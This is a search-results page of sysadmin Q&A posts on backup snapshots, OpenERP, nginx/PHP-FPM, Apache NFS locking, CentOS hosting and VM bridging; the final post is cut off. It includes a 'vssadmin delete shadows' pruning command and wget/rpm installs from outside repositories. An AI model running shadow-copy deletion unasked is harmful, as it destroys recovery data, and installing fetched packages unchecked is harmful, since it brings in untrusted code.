Search Results

Search found 8408 results on 337 pages for 'cgi bin'.


  • NetBackup with VSS and Instant Recovery - Failing to delete old snapshots

    - by Jonathan Bourke
    We are attempting to implement Microsoft VSS for snapshotting in our NetBackup 6.5.3.1 environment. The clients are both 32- and 64-bit Windows 2003 Server. Snapshot parameters are:

        Instant recovery is enabled
        Maximum snapshots = 1
        Provider type = 1 (System)
        Snapshot attribute = 1 (Differential)

    All backups successfully complete, and VSS shadows are successfully created both for the snapshot backup and for the open files (shadow copy components).

    The Issue: NetBackup is not clearing or overwriting old snapshots with each successive backup. When we list shadows and shadow storage, the list keeps growing and growing. It is not honouring the Maximum Snapshots setting.

    The Logs: The bpfis log doesn't really appear to show any errors other than for methods which we are not employing (VxVM, FlashSnap, etc.). A section is as follows:

        11:54:10.744 [348.4724] <2> logparams: D:\Program Files\Veritas\NetBackup\bin\bpfis.exe delete -nbu -id htpststr001.san.mgmt.det_1248918143 -bpstart_to 300 -bpend_to 300 -clnt htpststr001.san.mgmt.det
        11:54:10.744 [348.4724] <4> bpfis: INF - BACKUP START 348
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: VfMS error 10; see following messages:
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: Non-fatal method error was reported
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: vfm_configure_fi_one: method: FlashSnap, type: FIM, function: FlashSnap_init
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: VfMS method error 3; see following message:
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: FlashSnap_init: Veritas Volume Manager not installed.
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: VfMS error 10; see following messages:
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: Non-fatal method error was reported
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: vfm_configure_fi_one: method: vxvm, type: FIM, function: vxvm_init
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: VfMS method error 3; see following message:
        11:54:11.713 [348.4724] <8> onlfi_initialize_vfms: vxvm_init: Veritas Volume Manager not installed.
        11:54:11.713 [348.4724] <4> onlfi_thaw: Thawing C:\ using snapshot method VSS.
        11:54:11.713 [348.4724] <2> onlfi_vfms_logf: vfm_thaw: delete snapshot ...
        11:54:11.744 [348.4724] <2> onlfi_vfms_logf: snapshot services: emcclariionfi:Thu Jul 30 2009 11:54:11.744000 <Thread id - 4724> Unable to import any login credentials for any appliances.
        11:54:11.760 [348.4724] <2> onlfi_vfms_logf: snapshot services: hpevafi:Thu Jul 30 2009 11:54:11.760000 <Thread id - 4724> CHpEvaPlugin::init: CLI tool is not installed.
        11:54:11.760 [348.4724] <2> onlfi_vfms_logf: snapshot services: hpmsafi:Thu Jul 30 2009 11:54:11.760000 <Thread id - 4724> No array mangement credentials are available in configuration file.
        11:54:13.806 [348.4724] <4> onlfi_thaw: do_thaw return value: 0
        11:54:13.806 [348.4724] <4> onlfi_thaw: Thawing D:\ using snapshot method VSS.
        11:54:15.806 [348.4724] <4> onlfi_thaw: do_thaw return value: 0
        11:54:19.806 [348.4724] <2> fis_delete_id: removing D:\Program Files\Veritas\NetBackup\online_util\fi_cntl\bpfis.fim.htpststr001.san.mgmt.det_1248918143.0
        11:54:19.806 [348.4724] <2> fis_delete_id: removing D:\Program Files\Veritas\NetBackup\online_util\fi_cntl\bpfis.fim.htpststr001.san.mgmt.det_1248918143.0.fiid
        11:54:19.853 [348.4724] <4> bpfis: INF - EXIT STATUS 0: the requested operation was successfully completed

    The Question: Has anyone any experience of NetBackup / VSS not clearing snapshots after backups? We will ultimately be using an HP EVA for the snapshots, but we want to ensure correct functioning at the VSS level before we go further. Regards, Jonathan (PS: Question previously posted by my colleague on entsupport.symantec.com)
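
    While the NetBackup side is investigated, the built-in vssadmin tool can inspect and prune shadows by hand so the shadow storage doesn't fill the disk. This is only a stopgap sketch; the drive letters and size cap are placeholders, and the delete verb is only available on server SKUs of Windows 2003:

        rem list what is currently held
        vssadmin list shadows
        vssadmin list shadowstorage

        rem prune the oldest shadow for a given volume (placeholder drive letter)
        vssadmin delete shadows /for=C: /oldest

        rem cap the space VSS may consume so runaway snapshots cannot fill the disk
        vssadmin resize shadowstorage /for=C: /on=C: /maxsize=10GB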

    Read the article

  • OpenERP: error loading the auth_openid module

    - by spy86
    I installed the OpenERP server on CentOS 6.4. When I try to start the server with the OpenERP module auth_openid, I get this error:

        [openerp@ bin]$ ./openerp-server --load=web,auth_openid
        2013-10-22 13:02:18,705 22381 INFO ? openerp: OpenERP version 7.0
        2013-10-22 13:02:18,705 22381 INFO ? openerp: addons paths: /opt/openerp/openerp-sr-preprod/current/server/openerp/addons
        2013-10-22 13:02:18,705 22381 INFO ? openerp: database hostname: localhost
        2013-10-22 13:02:18,705 22381 INFO ? openerp: database port: 5432
        2013-10-22 13:02:18,705 22381 INFO ? openerp: database user: openerp
        2013-10-22 13:02:18,706 22381 WARNING ? openerp.modules.module: module web: module not found
        2013-10-22 13:02:18,707 22381 CRITICAL ? openerp.modules.module: Couldn't load module web
        2013-10-22 13:02:18,707 22381 CRITICAL ? openerp.modules.module: No module named web
        2013-10-22 13:02:18,707 22381 ERROR ? openerp.service: Failed to load server-wide module web. The web module is provided by the addons found in the openerp-web project. Maybe you forgot to add those addons in your addons_path configuration.
        Traceback (most recent call last):
          File "/opt/openerp/openerp-sr-preprod/current/server/openerp/service/__init__.py", line 60, in load_server_wide_modules
            openerp.modules.module.load_openerp_module(m)
          File "/opt/openerp/openerp-sr-preprod/current/server/openerp/modules/module.py", line 405, in load_openerp_module
            __import__('openerp.addons.' + module_name)
          File "/opt/openerp/openerp-sr-preprod/current/server/openerp/modules/module.py", line 132, in load_module
            f, path, descr = imp.find_module(module_part, ad_paths)
        ImportError: No module named web
        2013-10-22 13:02:18,707 22381 WARNING ? openerp.modules.module: module auth_openid: module not found
        2013-10-22 13:02:18,708 22381 CRITICAL ? openerp.modules.module: Couldn't load module auth_openid
        2013-10-22 13:02:18,708 22381 CRITICAL ? openerp.modules.module: No module named auth_openid
        2013-10-22 13:02:18,708 22381 ERROR ? openerp.service: Failed to load server-wide module auth_openid.
        Traceback (most recent call last):
          File "/opt/openerp/openerp-sr-preprod/current/server/openerp/service/__init__.py", line 60, in load_server_wide_modules
            openerp.modules.module.load_openerp_module(m)
          File "/opt/openerp/openerp-sr-preprod/current/server/openerp/modules/module.py", line 405, in load_openerp_module
            __import__('openerp.addons.' + module_name)
          File "/opt/openerp/openerp-sr-preprod/current/server/openerp/modules/module.py", line 132, in load_module
            f, path, descr = imp.find_module(module_part, ad_paths)
        ImportError: No module named auth_openid
        2013-10-22 13:02:18,713 22381 INFO ? openerp: OpenERP server is running, waiting for connections...

        Exception in thread Thread-1:
        Traceback (most recent call last):
          File "/usr/lib64/python2.6/threading.py", line 532, in __bootstrap_inner
            self.run()
          File "/usr/lib64/python2.6/threading.py", line 484, in run
            self.__target(*self.__args, **self.__kwargs)
          File "/opt/openerp/openerp-sr-preprod/current/server/openerp/service/wsgi_server.py", line 436, in serve
            httpd = werkzeug.serving.make_server(interface, port, application, threaded=True)
          File "/usr/lib/python2.6/site-packages/Werkzeug-0.7-py2.6.egg/werkzeug/serving.py", line 399, in make_server
            passthrough_errors, ssl_context)
          File "/usr/lib/python2.6/site-packages/Werkzeug-0.7-py2.6.egg/werkzeug/serving.py", line 331, in __init__
            HTTPServer.__init__(self, (host, int(port)), handler)
          File "/usr/lib64/python2.6/SocketServer.py", line 402, in __init__
            self.server_bind()
          File "/usr/lib64/python2.6/BaseHTTPServer.py", line 108, in server_bind
            SocketServer.TCPServer.server_bind(self)
          File "/usr/lib64/python2.6/SocketServer.py", line 413, in server_bind
            self.socket.bind(self.server_address)
          File "", line 1, in bind
        error: [Errno 98] Address already in use

    Does anybody have advice on what's wrong? Regards
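
    The log actually shows two separate problems: the web and auth_openid addons are simply not on the addons path (only the server's own addons directory is listed), and Errno 98 means another process is already bound to the OpenERP port. A hedged sketch of both checks; the openerp-web path is a guess based on the usual openerp-web checkout layout, and 8069 is the OpenERP 7 default port:

        # see which process already holds the port
        netstat -tlnp | grep 8069

        # point the server at the web client's addons as well as the server addons
        ./openerp-server --load=web,auth_openid \
            --addons-path=/opt/openerp/openerp-sr-preprod/current/server/openerp/addons,/opt/openerp/openerp-sr-preprod/current/web/addons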

    Read the article

  • Nginx + PHP - No input file specified for 1 server block. Other server block works fine

    - by F21
    I am running Ubuntu Desktop 12.04 with nginx 1.2.6. PHP is PHP-FPM 5.4.9. This is the relevant part of my nginx.conf:

        http {
            include       mime.types;
            default_type  application/octet-stream;
            sendfile      on;
            keepalive_timeout 65;

            server {
                server_name testapp.com;
                root  /www/app/www/;
                index index.php index.html index.htm;

                location ~ \.php$ {
                    fastcgi_intercept_errors on;
                    fastcgi_pass  127.0.0.1:9000;
                    fastcgi_index index.php;
                    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
                    include       fastcgi_params;
                }
            }

            server {
                listen 80 default_server;
                root  /www;
                index index.html index.php;

                location ~ \.php$ {
                    fastcgi_intercept_errors on;
                    fastcgi_pass  127.0.0.1:9000;
                    fastcgi_index index.php;
                    fastcgi_param SCRIPT_FILENAME $document_root$fastcgi_script_name;
                    include       fastcgi_params;
                }
            }
        }

    Relevant bits from php-fpm.conf:

        ; Chroot to this directory at the start. This value must be defined as an
        ; absolute path. When this value is not set, chroot is not used.
        ; Note: you can prefix with '$prefix' to chroot to the pool prefix or one
        ; of its subdirectories. If the pool prefix is not set, the global prefix
        ; will be used instead.
        ; Note: chrooting is a great security feature and should be used whenever
        ; possible. However, all PHP paths will be relative to the chroot
        ; (error_log, sessions.save_path, ...).
        ; Default Value: not set
        ;chroot =

        ; Chdir to this directory at the start.
        ; Note: relative path can be used.
        ; Default Value: current directory or / when chroot
        chdir = /www

    In my hosts file, I redirect two domains, testapp.com and test.com, to 127.0.0.1. My web files are all stored in /www. With the above settings, if I visit test.com/phpinfo.php or test.com/app/www, everything works as expected and I get output from PHP. However, if I visit testapp.com, I get the dreaded "No input file specified." error. So, at this point, I pull out the log files and have a look:

        2012/12/19 16:00:53 [error] 12183#0: *17 FastCGI sent in stderr: "Unable to open primary script: /www/app/www/index.php (No such file or directory)" while reading response header from upstream, client: 127.0.0.1, server: testapp.com, request: "GET / HTTP/1.1", upstream: "fastcgi://127.0.0.1:9000", host: "testapp.com"

    This baffles me because I have checked again and again, and /www/app/www/index.php definitely exists! This is also validated by the fact that test.com/app/www/index.php works, which means the file exists and the permissions are correct. Why is this happening, and what are the root causes of things breaking for just the testapp.com v-host? An update on my investigation: I have commented out chroot and chdir in php-fpm.conf to narrow down the problem. If I remove the location ~ \.php$ block for testapp.com, then nginx sends me a bin file which contains the PHP code, which means that on nginx's side things are fine. The problem is that something must be mangling the file paths when passing them to PHP-FPM. Having said that, it is quite strange that the default_server v-host works fine when its root is /www, whereas things just won't work for the testapp.com v-host whose root is /www/app/www.
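
    One way to take nginx out of the equation is to hand PHP-FPM the same SCRIPT_FILENAME directly and see whether the worker itself can open the file; if it fails there too, a lingering chroot/chdir in the pool config (all paths become relative to the chroot) is the usual suspect. A hedged sketch using the cgi-fcgi utility from the FastCGI devkit, assuming it is installed:

        # ask the FPM pool on 127.0.0.1:9000 to run the exact script nginx would request
        SCRIPT_NAME=/index.php \
        SCRIPT_FILENAME=/www/app/www/index.php \
        REQUEST_METHOD=GET \
        cgi-fcgi -bind -connect 127.0.0.1:9000

    If this also reports "No input file specified", the problem lives entirely in php-fpm.conf; if it works, compare the fastcgi_params each server block actually sends.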

    Read the article

  • Installation error on Ubuntu 11.10

    - by Abhishek Chanda
    I upgraded to Ubuntu 11.10 and now, when I try to install or uninstall software, I get this error:

        installArchives() failed: (Reading database ... (Reading database ... 5% (Reading database ... 10% (Reading database ... 15% (Reading database ... 20% (Reading database ... 25% (Reading database ... 30% (Reading database ... 35% (Reading database ... 40% (Reading database ... 45% (Reading database ... 50% (Reading database ... 55% (Reading database ... 60% (Reading database ... 65% (Reading database ... 70% (Reading database ... 75% (Reading database ... 80% (Reading database ... 85% (Reading database ... 90% (Reading database ... 95% (Reading database ... 100% (Reading database ... 158945 files and directories currently installed.)
        Removing aisleriot ...
        Processing triggers for gconf2 ...
        Processing triggers for man-db ...
        Processing triggers for hicolor-icon-theme ...
        Processing triggers for libglib2.0-0 ...
        Processing triggers for gnome-menus ...
        Processing triggers for desktop-file-utils ...
        Processing triggers for bamfdaemon ...
        Rebuilding /usr/share/applications/bamf.index...
        Setting up flashplugin-downloader (11.0.1.152ubuntu1) ...
        Downloading...
        --2012-05-02 18:47:29-- http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.0.1.152.orig.tar.gz
        Resolving archive.canonical.com... 91.189.92.150, 91.189.92.191
        Connecting to archive.canonical.com|91.189.92.150|:80... connected.
        HTTP request sent, awaiting response... 404 Not Found
        2012-05-02 18:47:29 ERROR 404: Not Found.
        download failed
        The Flash plugin is NOT installed.
        dpkg: error processing flashplugin-downloader (--configure):
         subprocess installed post-installation script returned error exit status 1
        dpkg: dependency problems prevent configuration of flashplugin-installer:
         flashplugin-installer depends on flashplugin-downloader (>= 11.0.1.152ubuntu1); however:
          Package flashplugin-downloader is not configured yet.
        dpkg: error processing flashplugin-installer (--configure):
         dependency problems - leaving unconfigured
        No apport report written because the error message indicates its a followup error from a previous failure.
        Errors were encountered while processing:
         flashplugin-downloader
         flashplugin-installer
        Error in function: SystemError: E:Sub-process /usr/bin/dpkg returned an error code (1)
        Setting up flashplugin-downloader (11.0.1.152ubuntu1) ...
        Downloading...
        --2012-05-02 18:47:33-- http://archive.canonical.com/pool/partner/a/adobe-flashplugin/adobe-flashplugin_11.0.1.152.orig.tar.gz
        Resolving archive.canonical.com... 91.189.92.191, 91.189.92.150
        Connecting to archive.canonical.com|91.189.92.191|:80... connected.
        HTTP request sent, awaiting response... 404 Not Found
        2012-05-02 18:47:34 ERROR 404: Not Found.
        download failed
        The Flash plugin is NOT installed.
        dpkg: error processing flashplugin-downloader (--configure):
         subprocess installed post-installation script returned error exit status 1
        dpkg: dependency problems prevent configuration of flashplugin-installer:
         flashplugin-installer depends on flashplugin-downloader (>= 11.0.1.152ubuntu1); however:
          Package flashplugin-downloader is not configured yet.
        dpkg: error processing flashplugin-installer (--configure):
         dependency problems - leaving unconfigured

    This seems to be a bug that has been reported. Does anyone know a workaround?
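
    Since the post-install script fails only because the tarball URL now returns 404, a common way to unwedge dpkg is to purge the two Flash packages so the rest of the package system works again, then reinstall once the archive is fixed. A hedged sketch:

        # get dpkg out of the half-configured state
        sudo apt-get update
        sudo apt-get remove --purge flashplugin-installer flashplugin-downloader
        sudo apt-get install -f

        # later, try the installer again (or install Flash from Adobe's tarball by hand)
        sudo apt-get install flashplugin-installer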

    Read the article

  • How to set up a centralized backup server with lots of offsite workstations, intermittent internet connectivity, and stubborn users?

    - by Zac B
    This might be an impossible question. Context: We have a bunch of computers across around 1000 users. We have a centralized office where 900 of the users work, most of the time. Most of the computers are laptops. They are very frequently coming on and off the network for hours at a time. Users often take their computers home and do lots of work from home. In addition, there are a handful of users who work elsewhere in the country, who are offline (no internet connection whatsoever) for more than half of the time they use their machines. All of the machines are Windows 7/XP. Problem: People are always losing data. One day someone accidentally deletes a bunch of files. The next day someone else installs a bad driver or tries to mess with something in system32 and needs a personal data backup/reinstall of Windows. Because of how many of our business operations are done without an internet connection, and how frequently computers come on- and offline, it's unfeasible to make users use network storage for all of their data. We tried giving them Dropboxes, and they stored their files elsewhere. We bought and deployed Altiris, and they uninstalled it and blamed us when they couldn't get back files that they accidentally deleted while they were offline and hadn't taken a backup in months. We tried teaching them backup best practices and using scheduled sync tools to upload things to the network drives, and they turned them off because they "looked like viruses". It doesn't help that many of these users are pretty high up in the business and are not amenable to any sort of "you need to do something regularly because we say so" solution. Question: Other than finding another job where IT is treated differently and users are willing to follow best practices, how would people recommend I implement a file backup solution that supports the following?

        - Backs up to a centralized server over LAN or WAN whenever a network link becomes available, or on a schedule.
        - Supports interrupted/resumed backups (and hopefully file-delta-only backups), since connections to the network (WAN or LAN) are often slow and only open for half an hour or so.
        - Supports relatively rapid, "I accidentally deleted the TPS reports! Oh no!" single-file recovery, ideally administered from the central backup server rather than the client PC.
        - Supports local-to-local file-delta backup on a schedule, so that users without a network connection for a few days can still retrieve accidental deletions or whatnot. Ideally, the locally stored backups would be pushed up to the server whenever a network link is available.
        - Isn't configurable on the clients without certain credentials, because the CFOs (who won't give up their admin rights on the domain) will disable it if they can.
        - Backs up the entire hard drive. There are people who are self-righteous about storing things in C:\, or in the recycle bin, or in the C:\Windows dir (yes, I know).

    I'm fine integrating multiple products/solutions, or scripting different programs together myself (I'm a somewhat competent programmer), but I've been drawing a blank on where to start. Dropbox is folder-specific, Altiris doesn't cope with LAN outages or interrupted/resumed backups, and Volume Shadow Copy is awesome for a local-to-local solution, but I don't know how to push days of stored shadow copies up to a server in a 2-hour window of network access. The company is fine with spending decent money on this: thousands (USD) on a server, and hundreds on clients, if necessary.
I want to emphasize that this isn't a shopping list request. While I wish there was a program out there that did what I want, I've looked pretty hard, and not found anything that fits the bill. Instead, I'm hoping for ideas on where to start hacking things together from scratch/from different technologies to make something stable that works. Cheers!
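
    As one concrete starting point for the "local-to-local now, push when a link appears" idea, a scheduled robocopy mirror is resumable and delta-ish (it only recopies changed files). A rough sketch, assuming Windows 7 clients (XP needs robocopy from the Resource Kit); the server name and drive letters are placeholders, and a real solution would still need server-side versioning so a mirrored deletion doesn't destroy the only copy:

        @echo off
        rem 1) local staging copy, so offline users still have yesterday's files
        robocopy C:\Users D:\LocalBackup /MIR /Z /R:1 /W:1 /XJ /LOG:C:\backup-local.log

        rem 2) opportunistic push: only runs if the server answers
        ping -n 1 backupsrv >nul 2>&1
        if %errorlevel%==0 (
            robocopy D:\LocalBackup \\backupsrv\backups\%COMPUTERNAME% /MIR /Z /R:1 /W:1 /LOG:C:\backup-push.log
        )

    /Z (restartable mode) is what lets an interrupted WAN copy resume mid-file on the next run.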

    Read the article

  • Apache 2.2 + PHP 5: processes never die and stay blocked on LOCK_SH

    - by Givre
    Server details:

        Server version: Apache/2.2.22 (Unix)
        Server built: Mar 28 2012 16:31:45
        Server's Module Magic Number: 20051115:30
        Server loaded: APR 1.4.6, APR-Util 1.4.1
        Compiled using: APR 1.4.6, APR-Util 1.4.1
        Architecture: 64-bit
        Server MPM: Prefork
          threaded: no
          forked: yes (variable process count)
        Server compiled with....
          -D APACHE_MPM_DIR="server/mpm/prefork"
          -D APR_HAS_SENDFILE
          -D APR_HAS_MMAP
          -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
          -D APR_USE_SYSVSEM_SERIALIZE
          -D APR_USE_PTHREAD_SERIALIZE
          -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
          -D APR_HAS_OTHER_CHILD
          -D AP_HAVE_RELIABLE_PIPED_LOGS
          -D DYNAMIC_MODULE_LIMIT=128
          -D HTTPD_ROOT="/opt/apache2"
          -D SUEXEC_BIN="/opt/apache2/bin/suexec"
          -D DEFAULT_PIDLOG="logs/httpd.pid"
          -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
          -D DEFAULT_LOCKFILE="logs/accept.lock"
          -D DEFAULT_ERRORLOG="logs/error_log"
          -D AP_TYPES_CONFIG_FILE="conf/mime.types"
          -D SERVER_CONFIG_FILE="conf/httpd.conf"

    PHP 5.2.17, compiled as a mod_php5 DSO module.

    Problem: On shared webhosting, a lot of Apache processes never stop or die; they stay stuck until apache2 is restarted. Strace of one of these processes:

        access("tmp/meta_cache.txt", F_OK) = 0
        getcwd("/home/exemple.com/htdocs"..., 4096) = 34
        lstat("/var", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
        lstat("/var/www", {st_mode=S_IFDIR|0755, st_size=4096, ...}) = 0
        lstat("/home", {st_mode=S_IFDIR|0755, st_size=1715, ...}) = 0
        lstat("/home/exemple.com", {st_mode=S_IFDIR|0755, st_size=16, ...}) = 0
        lstat("/home/exemple.com/htdocs", {st_mode=S_IFDIR|0770, st_size=51, ...}) = 0
        lstat("/home/exemple.com/htdocs/tmp", {st_mode=S_IFDIR|0777, st_size=51, ...}) = 0
        lstat("/home/exemple.com/htdocs/tmp/meta_cache.txt", {st_mode=S_IFREG|0666, st_size=8901, ...}) = 0
        [the same getcwd/lstat walk repeats twice more]
        open("/home/exemple.com/htdocs/tmp/meta_cache.txt", O_RDONLY) = 10905
        fstat(10905, {st_mode=S_IFREG|0666, st_size=8901, ...}) = 0
        lseek(10905, 0, SEEK_CUR) = 0
        flock(10905, LOCK_SH) =

    The process never dies and stays like this. All files are on NFSv3. I don't know how to solve this problem or where to find more information. The effect is that all Apache processes eventually end up stuck this way and apache2 falls over completely. Thanks for your help.
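
    The trace ends inside flock(fd, LOCK_SH) with no return value, i.e. the process is parked in the kernel waiting for a lock that, on NFSv3, may be held by a dead client or unserviceable by the lock daemon. If the PHP code doing this can be changed, one mitigation is a non-blocking lock attempt so the request fails fast instead of pinning an Apache child forever. A hedged sketch (the file name comes from the trace; the fallback policy is an assumption):

        <?php
        $fp = fopen('tmp/meta_cache.txt', 'r');
        if ($fp === false) {
            die('cannot open cache file');
        }

        // LOCK_NB makes flock() return immediately instead of blocking in the kernel;
        // $wouldblock is set when another process holds a conflicting lock.
        $wouldblock = 0;
        if (!flock($fp, LOCK_SH | LOCK_NB, $wouldblock)) {
            fclose($fp);
            if ($wouldblock) {
                // another process holds the lock: serve stale data or skip the
                // cache instead of hanging the worker
            }
        } else {
            $data = stream_get_contents($fp);
            flock($fp, LOCK_UN);
            fclose($fp);
        }

    On the ops side, checking that the NFS lock services (rpc.statd/lockd) are healthy on both client and server, or mounting with -o nolock if the cache is only ever used from this one host, are the usual next steps.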

    Read the article

  • Set up Linux box for hosting A-Z

    - by microchasm
    I am in the process of reinstalling the OS on a machine that will be used to host a couple of apps for our business. The apps will be local only; access from external clients will be via VPN only. The prior setup used a hosting control panel (Plesk) for most of the admin, and I was looking at using another similar piece of software for the reinstall, but I figured I should finally learn how it all works. I can do most of the things the software would do for me, but am unclear on how it all fits together. This is all an attempt to further distance myself from the land of Configuration Programmer/Programmer, if at all possible. I can't find a full walkthrough anywhere for what I'm looking for, so I thought I'd put up this question, and if people can help me on the way I will edit this with the answers and document my progress/pitfalls. Hopefully someday this will help someone down the line.

    The details: CentOS 5.5 x86_64; httpd: Apache/2.2.3; mysql: 5.0.77 (to be upgraded); php: 5.1 (to be upgraded)

    The requirements: SECURITY!! Secure file transfer, secure client access (SSL certs and CA), secure data storage, virtual hosts/multiple subdomains; local email would be nice, but not critical.

    The steps: Download the latest CentOS DVD iso (torrent worked great for me). Install CentOS: while going through the install, I checked the Server Components option, thinking I was going to be using another Plesk-like admin. In hindsight, considering I've decided to try to go my own way, this probably wasn't the best idea. Basic config: set up users, networking/IP address, etc. Yum update/upgrade.

    Upgrade PHP: To upgrade PHP to the latest version, I had to look to a repo outside CentOS. IUS looks great and I'm happy I found it!

        cd /tmp
        wget http://dl.iuscommunity.org/pub/ius/stable/Redhat/5/x86_64/epel-release-1-1.ius.el5.noarch.rpm
        rpm -Uvh epel-release-1-1.ius.el5.noarch.rpm
        wget http://dl.iuscommunity.org/pub/ius/stable/Redhat/5/x86_64/ius-release-1-4.ius.el5.noarch.rpm
        rpm -Uvh ius-release-1-4.ius.el5.noarch.rpm
        yum list | grep -w \.ius\.   # lists all packages available in the IUS repo
        rpm -qa | grep php           # lists installed packages that must be removed first, otherwise there will be conflicts
        yum shell
        > remove php-gd php-cli php-odbc php-mbstring php-pdo php php-xml php-common php-ldap php-mysql php-imap
        > install php53 php53-mcrypt php53-mysql php53-cli php53-common php53-ldap php53-imap php53-devel
        > transaction solve
        > transaction run
        php -v
        PHP 5.3.2 (cli) (built: Apr 6 2010 18:13:45)

    This process removes the old version of PHP and installs the latest.

    Upgrade MySQL: Pretty much the same process as above with PHP.

        /etc/init.d/mysqld stop
        rpm -qa | grep mysql         # installed mysql packages
        yum shell
        > remove mysql mysql-server
        > install mysql51 mysql51-server mysql51-devel
        > transaction solve
        > transaction run
        service mysqld start
        mysql -v
        Server version: 5.1.42-ius Distributed by The IUS Community Project

    The above upgrade instructions courtesy of the IUS wiki: http://wiki.iuscommunity.org/Doc/ClientUsageGuide

    Create a chroot jail to hold the SFTP user via rssh. This forces SCP/SFTP and circumvents a traditional FTP server setup.

        cd /tmp
        wget http://dag.wieers.com/rpm/packages/rssh/rssh-2.3.2-1.2.el5.rf.x86_64.rpm
        rpm -ivh rssh-2.3.2-1.2.el5.rf.x86_64.rpm
        useradd -m -d /home/dev -s /usr/bin/rssh dev
        passwd dev

    Edit /etc/rssh.conf to grant SFTP access to rssh users (vi /etc/rssh.conf and uncomment the line allowscp). This allows me to connect to the machine via the SFTP protocol in Transmit (my FTP program of choice; I'm sure it's similar with other FTP apps). The SFTP instructions above were appropriated (with appreciation!) from http://www.cyberciti.biz/tips/linux-unix-restrict-shell-access-with-rssh.html

    And this is where I'm at. I will keep editing this as I make progress. Any tips on how to configure virtual interfaces/IP-based virtual hosts for SSL, set up a CA, or anything else would be appreciated.
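
    On the SSL virtual-host question: Apache 2.2.3 on CentOS 5 predates usable SNI, so each SSL site needs its own IP (or port). A hedged sketch of one IP-based SSL vhost that also requires client certificates signed by your own CA; every path, IP, and hostname below is a placeholder:

        # /etc/httpd/conf.d/ssl-app.conf (placeholder paths/addresses)
        Listen 443
        <VirtualHost 10.0.0.10:443>
            ServerName app.internal.example
            DocumentRoot /var/www/app

            SSLEngine on
            SSLCertificateFile    /etc/pki/tls/certs/app.crt
            SSLCertificateKeyFile /etc/pki/tls/private/app.key

            # client-cert auth against an in-house CA
            SSLCACertificateFile  /etc/pki/tls/certs/internal-ca.crt
            SSLVerifyClient require
            SSLVerifyDepth  1
        </VirtualHost>

    The CA itself can be bootstrapped with openssl (a self-signed CA cert via openssl req -new -x509, then signing client CSRs with openssl ca); CentOS ships a CA helper script under /etc/pki/tls/misc for exactly this.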

    Read the article

  • Bridged virtual interface is not available or visible to ifconfig.

    - by Omniwombat
    Hello all. I'm running Ubuntu 9.04, kernel 2.6.28-18, and vmware-server 2.0.1. I'm attempting to setup a virtual linux machine to use a bridged interface rather than NAT or host-only. Both NAT and host-only work just fine. When running vmware-config.pl, I set /dev/vmnet0 to bridge eth0, /dev/vmnet1 to host-only, and /dev/vmnet8 to NAT. When I run ifconfig -a I see the physical interface (eth0), vmnet1 and vmnet8 both of which are up and have IP addresses assigned to them. I also see other various interfaces that are not relevant here. In the web console, when I ask that the guest machine's network card be bridged, it states that a bridged setup is "Not available" and shows the disabled device icon. Inside the guest machine, I do have an eth0 interface which I can set to anything I like, however it can't see my external network, or the host. I do see errors in my vmware/hostd.log which state: "The network bridge on device vmnet0 is not running. The virtual machine will not be able to communicate with the host or with other machines on your network" which confirms the problem. vmnet-bridge is running, and I see the following in my process table: /usr/bin/vmnet-bridge -d /var/run/vmnet-bridge-0.pid -n 0 -i eth0 I confirm that the /var/run/vmnet-bridge-0.pid file is there and that it points to the correct process. I saw this question relating to Ubuntu 9.04 and bridged interfaces, in which the poster determined that the vsock library was not getting built due to a flaw in the vmware-config.pl script. I applied the patch, reran the script, and confirm that vsock.ko and vsock.o are in my /lib directory structure. vsock does show up in an lsmod. My /etc/vmware directory has /vmnet1 and /vmnet8 subdirectories. They contain configuration utilities for running DHCP and nat type services as expected. There is no vmnet0 subdirectory. My /etc/vmware/netmap.conf file DOES show entries for vmnet0; both the name and the device as I configured it from the script. My /dev directory contains devices vmnet0 through vmnet9. They have major device number 119, and minor device numbers 0 through 9. /proc/net/dev shows statistics for vmnet1 and vmnet8, but not vmnet0. I have a /proc/vmnet directory, but it's empty. When I start or stop the vmware service with /etc/init.d/vmware start, I see the following: Starting VMware services: Virtual machine monitor done Virtual machine communication interface done VM communication interface socket family: done Virtual ethernet done Bridged networking on /dev/vmnet0 done Host-only networking on /dev/vmnet1 (background) done DHCP server on /dev/vmnet1 done Host-only networking on /dev/vmnet8 (background) done DHCP server on /dev/vmnet8 done NAT service on /dev/vmnet8 done VMware Server Authentication Daemon (background) done Shared Memory Available done Starting VMware management services: VMware Server Host Agent (background) done VMware Virtual Infrastructure Web Access Starting VMware autostart virtual machines: Virtual machines done Nothing appears to be wrong there. What n00b thing am I doing such that vmnet0 and only vmnet0 does not show up in the interface list?
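
    Given that everything else about vmnet0 looks configured (the netmap.conf entry, the device node, a running vmnet-bridge), one low-risk check is whether the bridge process is actually healthy, and to bounce just that process using the exact invocation already visible in the process table. A hedged sketch:

        # is the bridge process alive, and does its pidfile match?
        ps aux | grep vmnet-bridge
        cat /var/run/vmnet-bridge-0.pid

        # restart only the bridge, with the same arguments the service used
        sudo kill $(cat /var/run/vmnet-bridge-0.pid)
        sudo /usr/bin/vmnet-bridge -d /var/run/vmnet-bridge-0.pid -n 0 -i eth0

        # then watch the log the bridge error appeared in while toggling the guest NIC
        tail -f /var/log/vmware/hostd.log   # path is an assumption; use wherever your hostd.log lives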

    Read the article

  • Ubuntu 10.04: KVM bridged networking not working with public IP addresses

    - by senorsmile
    I have a dedicated hosted server box with Ubuntu 10.04 64-bit installed. I would like to run KVM with Ubuntu 8.04 installed for some PHP 5.2-compatible apps (they don't work right with PHP 5.3, the default in Ubuntu 10.04). I installed KVM as instructed at https://help.ubuntu.com/community/KVM/Installation. I installed the VM using virt-manager; I never could figure out how to use virt-install or any of those automated installers, so I just installed it from the disc. I set up bridged networking as per https://help.ubuntu.com/community/KVM/Networking. However, the bridged connection doesn't work. Here's my /etc/network/interfaces on the host, running Ubuntu 10.04 (with the specific public IPs blanked):

        auto lo
        iface lo inet loopback

